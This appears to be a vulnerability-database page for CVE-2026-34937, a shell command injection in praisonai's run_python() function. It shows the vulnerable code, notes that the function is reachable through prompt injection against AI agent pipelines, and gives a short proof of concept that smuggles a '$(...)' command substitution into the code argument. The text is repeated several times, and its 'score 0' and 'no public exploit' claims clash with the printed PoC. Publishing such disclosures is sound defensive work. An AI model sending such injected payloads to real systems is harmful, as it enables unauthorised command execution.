What is CVE-2026-34937?

### Summary `run_python()` in `praisonai` constructs a shell command string by interpolating user-controlled code into `python3 -c " "` and passing it to `subprocess.run(..., shell=True)`. The escaping logic only handles `\` and `"`, leaving `$()` and backtick substitutions unescaped, allowing arbitrary OS command execution before Python is invoked. ### Details `execute_command.py:290` (source) -> `execute_command.py:297` (hop) -> `execute_command.py:310` (sink) ```python # source -- user-controlled code argument def run_python(code: str, cwd=None, timeout=60): # hop -- incomplete escaping, $ and () not handled escaped_code = code.replace('\\', '\\\\').replace('"', '\\"') command = f'{python_cmd} -c "{escaped_code}"' # sink -- shell=True expands $() before python3 runs return execute_command(command=command, cwd=cwd, timeout=timeout) # execute_command calls subprocess.run(command, shell=True, ...) ``` ### PoC ```python # tested on: praisonai==0.0.81 (source install, commit HEAD 2026-03-30) # install: pip install -e src/praisonai import sys sys.path.insert(0, 'src/praisonai') from praisonai.code.tools.execute_command import run_python result = run_python(code='$(id > /tmp/injected)') print(result) # verify import subprocess print(subprocess.run(['cat', '/tmp/injected'], capture_output=True, text=True).stdout) # expected output: uid=1000(narey) gid=1000(narey) groups=1000(narey)... ``` ### Impact Any agent pipeline or API consumer that passes user or task-supplied content to `run_python()` is exposed to full OS command execution as the process user. The function is reachable via indirect prompt injection and the auto-generated Flask server deploys with `AUTH_ENABLED = False` by default when no token is configured.

What is the severity of CVE-2026-34937?

CVE-2026-34937 has a CVSS v3 score of 0, which is classified as Low severity.

Is there an exploit available for CVE-2026-34937?

No known public exploits are currently available for CVE-2026-34937.

Is there a patch available for CVE-2026-34937?

Yes, patches are available for CVE-2026-34937. Check the vendor advisories for update instructions.

CVE-2026-34937 - CVE Details, Severity, and Analysis

Published: April 2, 2026

Last updated:3 hours ago (April 2, 2026)

Updated April 2, 2026

no major risk factors

Summary

run_python() in praisonai constructs a shell command string by interpolating user-controlled code into python3 -c "<code>" and passing it to subprocess.run(..., shell=True). The escaping logic only handles \ and ", leaving $() and backtick substitutions unescaped, allowing arbitrary OS command execution before Python is invoked.

Details

execute_command.py:290 (source) -> execute_command.py:297 (hop) -> execute_command.py:310 (sink)

# source -- user-controlled code argument
def run_python(code: str, cwd=None, timeout=60):

# hop -- incomplete escaping, $ and () not handled
    escaped_code = code.replace('\\', '\\\\').replace('"', '\\"')
    command = f'{python_cmd} -c "{escaped_code}"'

# sink -- shell=True expands $() before python3 runs
    return execute_command(command=command, cwd=cwd, timeout=timeout)
    # execute_command calls subprocess.run(command, shell=True, ...)

PoC

# tested on: praisonai==0.0.81 (source install, commit HEAD 2026-03-30)
# install: pip install -e src/praisonai
import sys
sys.path.insert(0, 'src/praisonai')
from praisonai.code.tools.execute_command import run_python

result = run_python(code='$(id > /tmp/injected)')
print(result)

# verify
import subprocess
print(subprocess.run(['cat', '/tmp/injected'], capture_output=True, text=True).stdout)
# expected output: uid=1000(narey) gid=1000(narey) groups=1000(narey)...

Impact

Any agent pipeline or API consumer that passes user or task-supplied content to run_python() is exposed to full OS command execution as the process user. The function is reachable via indirect prompt injection and the auto-generated Flask server deploys with AUTH_ENABLED = False by default when no token is configured.

Strobes VI. (2026). CVE-2026-34937 - CVE Details and Analysis. Strobes VI. Retrieved April 2, 2026, from https://vi.strobes.co/cve/CVE-2026-34937

Published: April 2, 2026

Last updated:3 hours ago (April 2, 2026)

Updated April 2, 2026

no major risk factors

Summary

Details

execute_command.py:290 (source) -> execute_command.py:297 (hop) -> execute_command.py:310 (sink)

# source -- user-controlled code argument
def run_python(code: str, cwd=None, timeout=60):

# hop -- incomplete escaping, $ and () not handled
    escaped_code = code.replace('\\', '\\\\').replace('"', '\\"')
    command = f'{python_cmd} -c "{escaped_code}"'

# sink -- shell=True expands $() before python3 runs
    return execute_command(command=command, cwd=cwd, timeout=timeout)
    # execute_command calls subprocess.run(command, shell=True, ...)

PoC

# tested on: praisonai==0.0.81 (source install, commit HEAD 2026-03-30)
# install: pip install -e src/praisonai
import sys
sys.path.insert(0, 'src/praisonai')
from praisonai.code.tools.execute_command import run_python

result = run_python(code='$(id > /tmp/injected)')
print(result)

# verify
import subprocess
print(subprocess.run(['cat', '/tmp/injected'], capture_output=True, text=True).stdout)
# expected output: uid=1000(narey) gid=1000(narey) groups=1000(narey)...

Impact

Strobes VI. (2026). CVE-2026-34937 - CVE Details and Analysis. Strobes VI. Retrieved April 2, 2026, from https://vi.strobes.co/cve/CVE-2026-34937

CVE-2026-34937

Summary

Details

PoC

Impact

Ready for Agentic Automated Testing?

CVE-2026-34937

Summary

Details

PoC

Impact